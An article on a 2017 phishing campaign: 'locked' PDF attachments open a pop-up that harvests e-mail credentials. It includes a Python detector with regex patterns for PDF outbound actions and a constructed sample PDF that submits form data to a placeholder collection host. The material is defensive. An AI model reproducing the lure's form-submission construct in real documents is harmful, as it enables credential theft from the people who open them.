Just Wednesday, on the 4th of January (2017), a post warning about a new PDF-based phishing scam was published on the official website of the Internet Storm Center (ISC). The ISC is run by the SANS Technology Institute and was established to monitor malicious cyber activity, in particular large-scale attacks and breaches. That post responded to a recent spam campaign in the United States involving malicious PDF attachments.
In this phishing campaign the attachment carries no malware, at least in the initial phase of the attack. Its primary goal is to harvest victims' e-mail addresses and the login credentials that go with them.
The malicious e-mail purports to come from VetMeds and carries the subject line Assessment document. Attached is a PDF that is presented as locked; the message beneath the file reads PDF Secure File UNLOCK to Access File Content:
The word UNLOCK in that message is actually a link. If a user clicks it to unlock the content of the file, the following appears:
The file opens in the default PDF viewer, but a pop-up dialog blocks the view of the document and asks you to enter your e-mail address and password:
Inattentive users may enter their credentials, and whatever is typed into those two fields is sent to the attackers. Once they hold a victim's e-mail address and password, they can take the attack further.
The content of the PDF holds a further inconsistency. Although the theme of the e-mail is a VetMeds assessment, the file presents itself as documentation from SWIFT (Society for Worldwide Interbank Financial Telecommunication), specifically as a SWIFT banking transaction.
Before the PDF reader displays the blocking pop-up that asks for your e-mail credentials, it shows a security warning:
The text of the warning is:
The document is trying to connect to:
Do you trust myjino.ru? If you do not trust the site, choose Block.
However, on Windows 10 with Microsoft Edge you will not see the security alert above, because Windows 10 uses the Edge browser as its default PDF reader.
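The warning above exists because the PDF contains an action that reaches outside the viewer: a link to an external host, and a form whose contents are posted back to the attackers. A mail gateway or analyst can look for exactly those constructs before a user ever sees the dialog. The script below is an added example, not code from the ISC post or the campaign: it scans raw PDF bytes for outbound action types (URI, SubmitForm, Launch, JavaScript, GoToR), extracts the target URLs, and flags any document that posts form data or contacts a host outside an allowlist. The two PDFs embedded in it are constructed samples, and the host unlock.example.invalid is a placeholder, not an indicator from the article.

```python
import re
from urllib.parse import urlparse

# Action types that make a PDF reach out of the viewer: open a URL, post form
# data, run a program, run script, or open a remote document.
ACTION_RE = re.compile(rb"/S\s*/(URI|SubmitForm|Launch|JavaScript|GoToR)\b")
# Literal-string targets of URI (/URI (...)) and SubmitForm (/F (...)) actions.
TARGET_RE = re.compile(rb"/(?:URI|F)\s*\(((?:[^()\\]|\\.)*)\)")

# Constructed sample resembling the lure: a one-page PDF whose link annotation
# opens an external "unlock" URL and whose form posts to the same host.
# The host is a placeholder, not an indicator taken from the article.
LURE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [100 700 300 720] /A 5 0 R >> endobj
5 0 obj << /Type /Action /S /URI /URI (http://unlock.example.invalid/secure) >> endobj
6 0 obj << /Type /Action /S /SubmitForm /F (http://unlock.example.invalid/collect) /Flags 4 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign sample: same skeleton, no actions at all.
PLAIN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def _unescape(raw: bytes) -> str:
    """Resolve the simple backslash escapes allowed in PDF literal strings."""
    return re.sub(rb"\\(.)", lambda m: m.group(1), raw).decode("latin-1")


def action_types(pdf: bytes) -> dict:
    """Count each outbound action type present in the raw PDF bytes."""
    counts = {}
    for m in ACTION_RE.finditer(pdf):
        name = m.group(1).decode()
        counts[name] = counts.get(name, 0) + 1
    return counts


def targets(pdf: bytes) -> list:
    """Return every URI / SubmitForm target string, in document order."""
    return [_unescape(m.group(1)) for m in TARGET_RE.finditer(pdf)]


def hosts(pdf: bytes) -> set:
    """Hosts the document would contact if its actions fired."""
    return {urlparse(t).hostname for t in targets(pdf) if urlparse(t).hostname}


def triage(pdf: bytes, trusted_hosts: set) -> dict:
    """Flag a PDF that posts form data, runs code, or contacts hosts outside the allowlist."""
    reasons = []
    kinds = action_types(pdf)
    for kind in ("SubmitForm", "Launch", "JavaScript"):
        if kind in kinds:
            reasons.append(f"contains {kinds[kind]} {kind} action(s)")
    unknown = sorted(h for h in hosts(pdf) if h not in trusted_hosts)
    if unknown:
        reasons.append("contacts untrusted host(s): " + ", ".join(unknown))
    return {"verdict": "suspicious" if reasons else "clean", "reasons": reasons}


if __name__ == "__main__":
    for label, doc in (("lure", LURE_PDF), ("plain", PLAIN_PDF)):
        print(label, triage(doc, trusted_hosts={"intranet.example"}))
```

Scanning raw bytes is a first pass only: objects stored in compressed object streams or targets written as hex strings will not match these patterns, so a production check should first decompress the file with a full PDF parser and then apply the same rules to the decoded objects. The hostname the viewer names in its warning is the same value this script extracts, which makes the allowlist decision reviewable before the document reaches a user.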
To be safe, follow the general advice not to open spam e-mails. If you open one anyway, remember that legitimate files are not unlocked by entering your e-mail address or other sensitive credentials. And if the subject of the e-mail contradicts the contents of its body or of the attachment, treat that as a warning sign and stay away from the attachment.